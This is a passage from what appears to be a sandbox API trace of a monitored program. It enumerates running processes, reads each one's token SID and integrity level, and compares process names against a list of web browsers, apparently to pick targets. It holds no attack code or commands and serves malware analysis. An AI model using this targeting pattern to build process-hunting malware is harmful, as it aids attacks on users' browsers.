(in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.117] GetLastError () returned 0x7a [0229.117] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.117] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.117] CloseHandle (hObject=0xb8) returned 1 [0229.117] CloseHandle (hObject=0xb4) returned 1 [0229.117] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.117] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.117] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.117] GetLastError () returned 0x7a [0229.118] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.118] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.118] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.118] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0229.118] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0229.118] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0229.118] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0229.118] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0229.118] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0229.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0229.118] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.118] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.118] GetLastError () returned 0x7a [0229.118] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.118] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.118] CloseHandle (hObject=0xb8) returned 1 [0229.118] CloseHandle (hObject=0xb4) returned 1 [0229.118] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.118] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.118] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.118] GetLastError () returned 0x7a [0229.118] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.118] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.118] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.118] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0229.118] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0229.118] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0229.118] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0229.118] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0229.118] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0229.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0229.119] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.119] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.119] GetLastError () returned 0x7a [0229.119] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.119] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.119] CloseHandle (hObject=0xb8) returned 1 [0229.119] CloseHandle (hObject=0xb4) returned 1 [0229.119] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.119] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.119] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.119] GetLastError () returned 0x7a [0229.119] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.119] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.119] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.119] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0229.119] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0229.119] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0229.119] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0229.119] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0229.119] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0229.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0229.119] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.119] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.119] GetLastError () returned 0x7a [0229.119] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.119] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.119] CloseHandle (hObject=0xb8) returned 1 [0229.119] CloseHandle (hObject=0xb4) returned 1 [0229.119] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.120] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.120] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.120] GetLastError () returned 0x7a [0229.120] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.120] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.120] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.120] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0229.120] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0229.120] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0229.120] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0229.120] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0229.120] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0229.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0229.120] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.120] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.120] GetLastError () returned 0x7a [0229.120] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.120] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.120] CloseHandle (hObject=0xb8) returned 1 [0229.120] CloseHandle (hObject=0xb4) returned 1 [0229.120] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.120] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.120] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.120] GetLastError () returned 0x7a [0229.120] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.120] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.120] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.120] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0229.120] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0229.121] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0229.121] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0229.121] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0229.121] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0229.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xb4 [0229.121] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.121] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.121] GetLastError () returned 0x7a [0229.121] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.121] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.121] CloseHandle (hObject=0xb8) returned 1 [0229.121] CloseHandle (hObject=0xb4) returned 1 [0229.121] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.121] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.121] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.121] GetLastError () returned 0x7a [0229.121] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.121] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.121] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.121] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0229.121] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0229.121] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0229.121] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0229.121] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0229.121] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0229.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0229.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0229.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0229.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0229.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0229.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0229.122] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.122] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.122] GetLastError () returned 0x7a [0229.122] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.122] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.122] CloseHandle (hObject=0xb8) returned 1 [0229.122] CloseHandle (hObject=0xb4) returned 1 [0229.122] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.122] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.122] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.122] GetLastError () returned 0x7a [0229.122] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.122] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.122] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.122] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0229.122] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0229.122] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0229.122] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0229.122] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0229.122] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0229.122] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.122] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0231.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x4bfd5c | out: SystemInformation=0x0, ResultLength=0x4bfd5c*=0xc0a0) returned 0xc0000004 [0231.121] VirtualAlloc (lpAddress=0x0, dwSize=0xd0a0, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0231.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0xd0a0, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0231.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0231.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0231.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0231.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0231.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0231.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0231.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0231.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0231.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0231.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0231.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0231.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0231.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0231.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0231.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0231.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0231.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0231.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0231.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0231.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0231.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0231.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0231.124] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.124] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.124] GetLastError () returned 0x7a [0231.124] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.124] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.124] CloseHandle (hObject=0xb8) returned 1 [0231.124] CloseHandle (hObject=0xb4) returned 1 [0231.124] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.125] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.125] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.125] GetLastError () returned 0x7a [0231.125] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.125] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.125] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.125] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0231.125] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0231.125] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0231.125] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0231.125] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") 